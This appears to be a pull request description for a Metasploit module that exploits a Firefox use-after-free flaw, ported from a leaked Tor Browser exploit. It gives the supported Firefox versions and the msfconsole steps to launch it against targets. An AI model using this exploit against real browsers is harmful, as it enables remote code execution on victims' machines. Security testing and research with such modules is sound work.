This exploits the use after free condition targeted by the leaked Tor Browser Bundle exploit originally located [here](https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html).  This module was created by reversing and porting the leaked exploit to target vanilla Firefox on Windows, which uses jemalloc and can be more reliably exploited than TBB with it's current allocator.

The module currently supports Firefox releases from approximately 38-41.  I intend to add support for more releases in the future (other people are welcome to contribute) but I just wanted to get it out there for now.  I'm also fine with changing the module ranking if need be, since it's sort of confusing as to what category it'd fall in.

It must be said that this wouldn't have been completed in any reasonable amount of time without the support from and hard work of a certain individual.  You deserve all the credit.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/browser/firefox_smil_uaf`
- [x] `set payload [PREFERRED PAYLOAD]`
- [x] `set [PAYLOAD OPTIONS]`
- [x] **OPTIONAL** `set UsePostHTML true` *see note at bottom*
- [x] `run`
- [x] You should get something like this:
![sessions](https://cloud.githubusercontent.com/assets/16786368/22160362/b6753c84-df0a-11e6-8210-b2489eaac99e.png)
- [x] **Verify** it works

100% reliability is not possible, though it should be close.  If it doesn't work, rinse and repeat.

* I included an option titled UsePostHTML that will render whatever page you like on the target after exploit completion.  It's mentioned in the module doc, but if you want to test it out, edit $datadirectory/exploits/firefox_smil_uaf/post.html - the included example is probably of no use to anyone.